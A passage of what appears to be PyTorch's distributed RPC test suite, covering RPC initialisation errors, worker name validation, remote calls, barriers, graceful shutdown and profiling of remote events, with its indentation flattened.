# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_pg_init_no_rpc_init(self):
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
class MyModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(3, 4)
def forward(self, x):
return self.lin(x)
model = MyModel()
model.train()
model = torch.nn.parallel.DistributedDataParallel(model)
with self.assertRaisesRegex(RuntimeError, 'Current RPC agent is not set! Did you initialize the RPC framework'):
params = []
for param in model.parameters():
params.append(RRef(param))
def test_world_size_one(self):
self._world_size_one(
torch.ones(2, 2),
torch.ones(2, 2)
)
@dist_init(setup_rpc=False)
def test_invalid_names(self):
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
            info = WorkerInfo("a" * 500, worker_id)
# Test that WorkerInfo can be pickled and sent in RPC call
@dist_init
def test_worker_info_pickle(self):
dst_rank = (self.rank + 1) % self.world_size
worker_info = rpc.api.get_worker_info()
ret = rpc.rpc_sync(worker_name(dst_rank), identity, args=(worker_info,))
self.assertEqual(ret, worker_info)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
        worker_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
            worker_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
self._multi_rpc(False)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, f, x, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
            # If join is not correctly implemented, worker2 would have been
            # shut down by now, and the RPCs below would fail.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
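    # Force the graceful-shutdown handshake to exceed its timeout by swapping
    # in a _wait_all_workers that performs a slow _all_gather, and verify that
    # rpc.shutdown(graceful=True, timeout=0.01) surfaces a RuntimeError.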
@dist_init(setup_rpc=False)
def test_wait_all_workers_timeout(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
og_func = rpc.api._wait_all_workers
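        # Replacement for _wait_all_workers: the SlowPickleClass(0.5) payload
        # makes the _all_gather slow enough to exceed the 0.01s shutdown
        # timeout used below.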
def wait_all_workers_sleep(timeout):
try:
rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
except RuntimeError as ex:
raise ex
rpc.api._wait_all_workers = wait_all_workers_sleep
try:
with self.assertRaisesRegex(RuntimeError, ''):
rpc.shutdown(graceful=True, timeout=0.01)
finally:
rpc.api._wait_all_workers = og_func
dist.barrier()
def test_wait_all_workers_dense(self):
self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_twice_dense(self):
self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
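    # Shared helper for the rpc barrier tests: the lexicographically smallest
    # worker name acts as the leader holding a global counter. Every
    # participant resets the counter on the leader, crosses the barrier,
    # increments the counter, and crosses the barrier again; in the
    # single-threaded case the leader then checks that the counter equals the
    # number of participants.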
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
        # This test validates the implementation of barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
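    # Shared assertion helper: the profiled RPC event name must embed the
    # caller and callee worker names, the function name (qualified name for
    # ScriptFunctions), and the RPC execution mode, and the event must have
    # been recorded exactly once.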
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
        # if cpu_memory_usage was not propagated over the wire, this set would
        # only contain 0 (indicating that no memory was profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
        # prefixed when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
            # Validate the order in which remote events show up in the profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
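    # Single profiled workload used by the autograd-context tests below: an
    # async torch.mul on requires_grad tensors against the given destination.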
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
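    # Profile a nested async RPC: rank 1 calls slow_async_add on dst1, which in
    # turn issues an RPC to dst2. Both the nested RPC event and the remote add
    # event should carry the expected composed profiling keys and node ids.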
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with _profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with _profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
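    # Strips the REMOTE_OP_STR prefix from remote event names and checks that
    # the remote aten::mul event was recorded on the destination worker with
    # the expected profiling metadata.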
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with _profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with _profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
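    # Common driver for the profiler tests: on rank 1 only, run func over the
    # given RPC mode under the profiler (optionally inside a record_function
    # scope named "foo") and validate the event's node id, the presence of
    # remote events, the recorded profiling info, and event ordering.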
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
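    # An event counts as top-level if it starts after the last recorded end
    # time on its thread, i.e. it is not nested inside another event; the
    # collected names are compared against the expectation as sorted lists.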
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
            # Get the top-level events from all events that happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
